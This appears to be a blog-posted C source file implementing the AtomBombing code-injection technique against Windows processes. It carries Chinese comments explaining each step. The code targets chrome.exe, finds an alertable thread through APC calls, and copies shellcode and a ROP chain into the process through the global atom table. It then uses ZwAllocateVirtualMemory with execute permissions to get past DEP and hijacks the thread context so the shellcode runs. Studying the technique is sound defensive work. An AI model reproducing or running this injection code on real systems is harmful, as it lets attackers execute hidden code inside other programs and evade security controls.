lblCleanup: return eReturn; } typedef struct _ROPCHAIN { // Return address of ntdll!ZwAllocateMemory PVOID pvMemcpy; // Params for ntdll!ZwAllocateMemory HANDLE ZwAllocateMemoryhProcess; PVOID ZwAllocateMemoryBaseAddress; ULONG_PTR ZwAllocateMemoryZeroBits; PSIZE_T ZwAllocateMemoryRegionSize; ULONG ZwAllocateMemoryAllocationType; ULONG ZwAllocateMemoryProtect; // Return address of ntdll!memcpy PVOID pvRetGadget; // Params for ntdll!memcpy PVOID MemcpyDestination; PVOID MemcpySource; SIZE_T MemcpyLength; } ROPCHAIN, *PROPCHAIN; ESTATUS main_BuildROPChain( PVOID pvROPLocation, PVOID pvShellcodeLocation, PROPCHAIN ptRopChain ) { ESTATUS eReturn = ESTATUS_INVALID; ROPCHAIN tRopChain = { 0 }; tRopChain.ZwAllocateMemoryhProcess = GetCurrentProcess(); tRopChain.ZwAllocateMemoryBaseAddress = (PUCHAR)pvROPLocation + FIELD_OFFSET( ROPCHAIN, MemcpyDestination ); tRopChain.ZwAllocateMemoryZeroBits = NULL; tRopChain.ZwAllocateMemoryRegionSize = (PSIZE_T)((PUCHAR)pvROPLocation + FIELD_OFFSET( ROPCHAIN, MemcpyLength) ); tRopChain.ZwAllocateMemoryAllocationType = MEM_COMMIT; tRopChain.ZwAllocateMemoryProtect = PAGE_EXECUTE_READWRITE; tRopChain.MemcpyDestination = (PVOID)0x00; tRopChain.MemcpySource = pvShellcodeLocation; tRopChain.MemcpyLength = sizeof(SHELLCODE); eReturn = GetFunctionAddressFromDll( NTDLL, MEMCPY, &tRopChain.pvMemcpy ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } printf("ntdll!memcpy: 0x%X", tRopChain.pvMemcpy); // Find a ret instruction in order to finally jump to the // newly allocated executable shellcode. eReturn = main_FindRetGadget(&tRopChain.pvRetGadget); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } eReturn = ESTATUS_SUCCESS; *ptRopChain = tRopChain; lblCleanup: return eReturn; } ESTATUS main_EnumProcessThreadIds( HANDLE hProcess, PDWORD *ppdwThreadIds, PDWORD pcbThreadIdsSize, PDWORD pdwNumberOfProcessThreads ) { HANDLE hSnapshot = NULL; ESTATUS eReturn = ESTATUS_INVALID; THREADENTRY32 tThreadEntry; BOOL bErr = FALSE; DWORD dwProcessId = 0; PDWORD pdwThreadIds = NULL; DWORD cbThreadIdsSize = 0; DWORD dwNumberOfMatchingThreads = 0; dwProcessId = GetProcessId(hProcess); hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); if (INVALID_HANDLE_VALUE == hSnapshot) { goto lblCleanup; } tThreadEntry.dwSize = sizeof(THREADENTRY32); bErr = Thread32First(hSnapshot, &tThreadEntry); if (FALSE == bErr) { goto lblCleanup; } do { if (tThreadEntry.th32OwnerProcessID != dwProcessId) { continue; } cbThreadIdsSize += sizeof(tThreadEntry.th32ThreadID); if (sizeof(tThreadEntry.th32ThreadID) == cbThreadIdsSize) { pdwThreadIds = (PDWORD)HeapAlloc( GetProcessHeap(), HEAP_ZERO_MEMORY, cbThreadIdsSize ); } else { pdwThreadIds = (PDWORD)HeapReAlloc( GetProcessHeap(), HEAP_ZERO_MEMORY, pdwThreadIds, cbThreadIdsSize ); } if (NULL == pdwThreadIds) { goto lblCleanup; } pdwThreadIds[dwNumberOfMatchingThreads++] = tThreadEntry.th32ThreadID; } while (bErr = Thread32Next(hSnapshot, &tThreadEntry)); *ppdwThreadIds = pdwThreadIds; *pcbThreadIdsSize = cbThreadIdsSize; *pdwNumberOfProcessThreads = dwNumberOfMatchingThreads; eReturn = ESTATUS_SUCCESS; lblCleanup: if ((NULL != hSnapshot) && (INVALID_HANDLE_VALUE != hSnapshot)) { CloseHandle(hSnapshot); hSnapshot = NULL; } if (ESTATUS_FAILED(eReturn)) { if (NULL != pdwThreadIds) { HeapFree(GetProcessHeap(), 0, pdwThreadIds); pdwThreadIds = NULL; } } return eReturn; } VOID main_CloseLocalHandleArray(PHANDLE phHandles, DWORD cbHandleCount) { for (DWORD dwIndex = 0; dwIndex < cbHandleCount; dwIndex++) { if (NULL != phHandles[dwIndex]) { CloseHandle(phHandles[dwIndex]); phHandles[dwIndex] = NULL; } } } VOID main_CloseRemoteHandleArray( HANDLE hProcess, PHANDLE phHandles, DWORD cbHandleCount ) { for (DWORD dwIndex = 0; dwIndex < cbHandleCount; dwIndex++) { HANDLE hTemp = NULL; if (NULL != phHandles[dwIndex]) { DuplicateHandle( hProcess, phHandles[dwIndex], GetCurrentProcess(), &hTemp, 0, FALSE, DUPLICATE_CLOSE_SOURCE ); phHandles[dwIndex] = NULL; } if (NULL != hTemp) { CloseHandle(hTemp); hTemp = NULL; } } } ESTATUS main_EnumProcessThreads( HANDLE hProcess, PHANDLE *pphProcessThreadsHandles, PDWORD pcbProcessThreadsHandlesSize, PDWORD pdwNumberOfProcessThreads ) { ESTATUS eReturn = ESTATUS_INVALID; PDWORD pdwProcessThreadIds = NULL; DWORD cbProcessThreadIdsSize = 0; DWORD dwNumberOfProcessThreads = 0; PHANDLE phProcessThreadsHandles = NULL; eReturn = main_EnumProcessThreadIds( hProcess, &pdwProcessThreadIds, &cbProcessThreadIdsSize, &dwNumberOfProcessThreads ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } cbProcessThreadIdsSize = dwNumberOfProcessThreads * sizeof(HANDLE); phProcessThreadsHandles = (PHANDLE)HeapAlloc( GetProcessHeap(), HEAP_ZERO_MEMORY, cbProcessThreadIdsSize ); if (NULL == phProcessThreadsHandles) { goto lblCleanup; } for (DWORD dwIndex = 0; dwIndex < dwNumberOfProcessThreads; dwIndex++) { DWORD dwThreadId = pdwProcessThreadIds[dwIndex]; phProcessThreadsHandles[dwIndex] = OpenThread(THREAD_ALL_ACCESS, FALSE, dwThreadId); if (NULL == phProcessThreadsHandles[dwIndex]) { eReturn = ESTATUS_MAIN_ENUMPROCESSTHREADS_OPENTHREAD_FAILED; goto lblCleanup; } } *pphProcessThreadsHandles = phProcessThreadsHandles; *pcbProcessThreadsHandlesSize = cbProcessThreadIdsSize; *pdwNumberOfProcessThreads = dwNumberOfProcessThreads; eReturn = ESTATUS_SUCCESS; lblCleanup: if (NULL != pdwProcessThreadIds) { HeapFree(GetProcessHeap(), 0, pdwProcessThreadIds); pdwProcessThreadIds = NULL; } if (ESTATUS_FAILED(eReturn)) { main_CloseLocalHandleArray(phProcessThreadsHandles, dwNumberOfProcessThreads); if (NULL != phProcessThreadsHandles) { HeapFree(GetProcessHeap(), 0, phProcessThreadsHandles); phProcessThreadsHandles = NULL; } } return eReturn; } ESTATUS main_GetThreadContext( HANDLE hThread, DWORD dwContextFlags, PCONTEXT ptContext ) { ESTATUS eReturn = ESTATUS_INVALID; DWORD dwErr = 0; BOOL bErr = FALSE; CONTEXT tContext = { NULL }; tContext.ContextFlags = dwContextFlags; SuspendThread(hThread); if (((DWORD)-1) == dwErr) { eReturn = ESTATUS_MAIN_GETTHREADCONTEXT_SUSPENDTHREAD_FAILED; goto lblCleanup; } bErr = GetThreadContext(hThread, &tContext); if (FALSE == bErr) { eReturn = ESTATUS_MAIN_GETTHREADCONTEXT_GETTHREADCONTEXT_FAILED; goto lblCleanup; } ResumeThread(hThread); if (((DWORD)-1) == dwErr) { eReturn = ESTATUS_MAIN_GETTHREADCONTEXT_RESUMETHREAD_FAILED; goto lblCleanup; } eReturn = ESTATUS_SUCCESS; *ptContext = tContext; lblCleanup: return eReturn; } ESTATUS main_FindAlertableThread(HANDLE hProcess, PHANDLE phAlertableThread) { ESTATUS eReturn = ESTATUS_INVALID; PHANDLE phProcessThreadsHandles = NULL; DWORD cbProcessThreadsHandlesSize = 0; DWORD dwNumberOfProcessThreads = 0; BOOL bErr = FALSE; DWORD dwErr = 0; HANDLE hAlertableThread = 0; PVOID pfnNtWaitForSingleObject = NULL; PHANDLE phLocalEvents = NULL; PHANDLE phRemoteEvents = NULL; eReturn = main_EnumProcessThreads( hProcess, &phProcessThreadsHandles, &cbProcessThreadsHandlesSize, &dwNumberOfProcessThreads ); //phProcessThreadsHandles 目标进程的所有线程 if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } for (DWORD dwIndex = 0; dwIndex < dwNumberOfProcessThreads; dwIndex++) { HANDLE hThread = phProcessThreadsHandles[dwIndex]; eReturn = main_NtQueueApcThreadWaitForSingleObjectEx( hThread, GetCurrentThread(), 5000, TRUE); //所有线程通过APC去调用WaitForSingleObjectEx来等待我们的当前线程 if (ESTATUS_FAILED(eReturn)) { continue; } } // 在本地创建和线程数目相等的Event phLocalEvents = (PHANDLE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwNumberOfProcessThreads * sizeof(HANDLE)); if (NULL == phLocalEvents) { eReturn = ESTATUS_MAIN_FINDALERTABLETHREAD_HEAPALLOC_FAILED; goto lblCleanup; } phRemoteEvents = (PHANDLE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwNumberOfProcessThreads * sizeof(HANDLE)); if (NULL == phRemoteEvents) { eReturn = ESTATUS_MAIN_FINDALERTABLETHREAD_HEAPALLOC2_FAILED; goto lblCleanup; } for (DWORD dwIndex = 0; dwIndex < dwNumberOfProcessThreads; dwIndex++) { HANDLE hThread = phProcessThreadsHandles[dwIndex]; phLocalEvents[dwIndex] = CreateEvent(NULL, TRUE, FALSE, NULL); if (NULL == phLocalEvents[dwIndex]) { eReturn = ESTATUS_MAIN_FINDALERTABLETHREAD_CREATEEVENT_FAILED; goto lblCleanup; } // 通过duplicate复制每个event句柄到目标进程的句柄表里 实现进程间通信 bErr = DuplicateHandle( GetCurrentProcess(), phLocalEvents[dwIndex], hProcess, &phRemoteEvents[dwIndex], 0, FALSE, DUPLICATE_SAME_ACCESS ); if (FALSE == bErr) { eReturn = ESTATUS_MAIN_FINDALERTABLETHREAD_DUPLICATEHANDLE_FAILED; goto lblCleanup; } //然后循环把所有线程都挂起然后调用SetEvent设置event信号 然后都用WaitForSingleObjectEx去等待当前线程(5秒然后恢复线程) eReturn = main_ApcSetEventAndKeepAlertable(hThread, phRemoteEvents[dwIndex]); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } } DWORD dwWaitResult = WaitForMultipleObjects(dwNumberOfProcessThreads, phLocalEvents, FALSE, 5000); if (WAIT_FAILED == dwWaitResult) { eReturn = ESTATUS_MAIN_FINDALERTABLETHREAD_WAITFORMULTIPLEOBJECTS_FAILED; goto lblCleanup; } if (WAIT_TIMEOUT == dwWaitResult) { eReturn = ESTATUS_MAIN_FINDALERTABLETHREAD_NO_ALERTABLE_THREADS_FOUND; goto lblCleanup; } hAlertableThread = phProcessThreadsHandles[dwWaitResult - WAIT_OBJECT_0]; //If the thread is in an alertable state, keep it that way "forever". //最后用WaitForMultipleObjects去等待所有event, //然后把第一个返回的再用WaitForSingleObjectEx永久等待(之前调用WaitForSingleObjectEx的超时都是5秒) eReturn = main_NtQueueApcThreadWaitForSingleObjectEx( hAlertableThread, GetCurrentThread(), INFINITE, TRUE ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } *phAlertableThread = hAlertableThread; eReturn = ESTATUS_SUCCESS; lblCleanup: main_CloseRemoteHandleArray( hProcess, phRemoteEvents, dwNumberOfProcessThreads ); if (NULL != phRemoteEvents) { HeapFree(GetProcessHeap(), 0, phRemoteEvents); phRemoteEvents = NULL; } main_CloseLocalHandleArray( phLocalEvents, dwNumberOfProcessThreads ); if (NULL != phLocalEvents) { HeapFree(GetProcessHeap(), 0, phLocalEvents); phLocalEvents = NULL; } for (DWORD dwIndex = 0; dwIndex < dwNumberOfProcessThreads; dwIndex++) { PHANDLE phThread = &phProcessThreadsHandles[dwIndex]; if ((NULL != *phThread) && (hAlertableThread != *phThread)) { CloseHandle(*phThread); *phThread = NULL; } } if (NULL != phProcessThreadsHandles) { HeapFree(GetProcessHeap(), 0, phProcessThreadsHandles); phProcessThreadsHandles = NULL; } return eReturn; } ESTATUS main_GetThreadTebAddress(HANDLE hThread, PVOID *ppvTebAddress) { ESTATUS eReturn = ESTATUS_INVALID; CONTEXT tContext = { 0 }; BOOL bErr = FALSE; LDT_ENTRY tLdtEnry = { 0 }; PVOID pvTebAddress; eReturn = main_GetThreadContext(hThread, CONTEXT_SEGMENTS, &tContext); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } bErr = GetThreadSelectorEntry(hThread, tContext.SegFs, &tLdtEnry); if (FALSE == bErr) { eReturn = ESTATUS_MAIN_GETTHREADTEBADDRESS_GETTHREADSELECTORENTRY_FAILED; goto lblCleanup; } pvTebAddress = (PVOID)( (tLdtEnry.BaseLow) | (tLdtEnry.HighWord.Bytes.BaseMid << 0x10) | (tLdtEnry.HighWord.Bytes.BaseHi << 0x18) ); *ppvTebAddress = pvTebAddress; eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } int main() { ESTATUS eReturn = ESTATUS_INVALID; PVOID pvRemoteShellcodeAddress = NULL; PVOID pvRemoteGetProcAddressLoadLibraryAddress = NULL; PVOID pvRemoteContextAddress = NULL; PVOID pvRemoteROPChainAddress = NULL; CONTEXT tContext = { 0 }; CHAR acShellcode[] = SHELLCODE; PVOID pvCodeCave = NULL; BOOL bErr = FALSE; ROPCHAIN tRopChain = { 0 }; HANDLE hProcess = NULL; HANDLE hAlertableThread = NULL; ATOM tAtom = 0; printf("[*] ATOM BOMBING\n\n\n"); eReturn = main_OpenProcessByName(L"chrome.exe", &hProcess); //获取进程句柄 if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } printf("[*] Searching for an alertable thread.\n\n\n"); eReturn = main_FindAlertableThread(hProcess, &hAlertableThread); ///遍历所有线程,然后循环对目标进程的所有线程通过APC去调用WaitForSingleObjectEx来等待我们的当前线程 if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } printf("[*] Found an alertable thread. Handle: 0x%X.\n\n\n", hAlertableThread); printf("[*] Finding remote code cave.\n\n\n"); // //获取代码空洞地址,就用kernelbase.dll的.data节的虚拟地址+SizeOfRawData eReturn = main_GetCodeCaveAddress(&pvCodeCave); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } printf("[*] Remote code cave found: 0x%X.\n\n\n", pvCodeCave); pvRemoteROPChainAddress = pvCodeCave; //存放的是ROPCHAIN结构体 pvRemoteContextAddress = (PUCHAR)pvRemoteROPChainAddress + sizeof(ROPCHAIN); //等于ROPCHAIN的大小是2c pvRemoteGetProcAddressLoadLibraryAddress = (PUCHAR)pvRemoteContextAddress + FIELD_OFFSET(CONTEXT, ExtendedRegisters); //CONTENT的大小是0xcc pvRemoteShellcodeAddress = (PUCHAR)pvRemoteGetProcAddressLoadLibraryAddress + 8; //就是pvRemoteGetProcAddressLoadLibraryAddress +8,pvRemoteGetProcAddressLoadLibraryAddress 里放的就是GetProcAddress和LoadLibrary的地址 printf("[*] Building ROP chain.\n\n\n"); //这个函数就是构造ROP,然后通过设置线程环境的EIP为AllocateVirtualMemory, //esp和ebp为拷贝到远程的pvRemoteROPChainAddress的地址,结合上面的ROPCHAIN结构的实际数据来举例, //当目标线程恢复后跳到AllocateVirtualMemory入口点,因为esp地址为pvRemoteROPChainAddress了,所以pvMemcpy为函数返回地址, //下面6个为参数,实为AllocateVirtualMemory(0xffffffff,0x76d01420,0,0x76d01428,0x1000,0x40); //可以看到保护为0x40,实为PAGE_EXECUTE_READWRITE,根据原文中作者的意思是过DEP,AllocateVirtualMemory调用完了之后就跳到Memcpy去执行, //现在esp的结构 eReturn = main_BuildROPChain(pvRemoteROPChainAddress, pvRemoteShellcodeAddress, &tRopChain); //pvRetGadget是返回地址,下面3个是参数,pvRetGadget实际只是一个ret指令在ntdll.dll的地址,实为memcpy(0,0x76d01500,0x171); //这里目标为0,是因为AllocateVirtualMemory的目标地址为0x76d01420,AllocateVirtualMemory调用完了后这里就会放一个地址了, //memcpy拷贝完shellcode后,就会返回到pvRetGadget去执行,ret就会返回到0x76d01420里的拷贝过来的shellcode去执行 //,它首先通过GlobalAddAtom函数把要拷贝的数据放到原子表里然后得到原子,再用APC在目标线程用原子调用GlobalGetAtomName把原子里的数据放到远程内存地址里 if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } printf("[*] Copying the addresses of LoadLibraryA and GetProcAddress to the remote process's memory address space.\n\n\n"); eReturn = main_ApcCopyFunctionPointers(hProcess, hAlertableThread, pvRemoteGetProcAddressLoadLibraryAddress); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } *(PDWORD)(acShellcode + SHELLCODE_FUNCTION_POINTERS_OFFSET) = (DWORD)(pvRemoteGetProcAddressLoadLibraryAddress); printf("[*] Copying the shellcode to the target process's address space.\n\n\n"); eReturn = main_ApcWriteProcessMemory(hProcess, hAlertableThread, (PUCHAR)pvRemoteShellcodeAddress, acShellcode, sizeof(acShellcode)); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } printf("[*] Copying ROP chain to the target process's address space: 0x%X.\n\n\n", pvRemoteROPChainAddress); eReturn = main_ApcWriteProcessMemory(hProcess, hAlertableThread, (PUCHAR)pvRemoteROPChainAddress, &tRopChain, sizeof(tRopChain)); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } bErr = main_GetThreadContext(hAlertableThread, CONTEXT_CONTROL, &tContext); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } tContext.Eip = (DWORD)GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwAllocateVirtualMemory"); tContext.Ebp = (DWORD)(PUCHAR)pvRemoteROPChainAddress; tContext.Esp = (DWORD)(PUCHAR)pvRemoteROPChainAddress; printf("[*] Hijacking the remote thread to execute the shellcode (by executing the ROP chain).\n\n\n"); eReturn = main_ApcSetThreadContext(hProcess, hAlertableThread, &tContext, pvRemoteContextAddress); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } lblCleanup: if (NULL != hProcess) { CloseHandle(hProcess); hProcess = NULL; } if (NULL != hAlertableThread) { CloseHandle(hAlertableThread); hAlertableThread = NULL; } return 0; }
爱程序 不爱bug
爱生活 不爱黑眼圈
我和你们一样 我和你们不一样
我不是凡客 我要做geek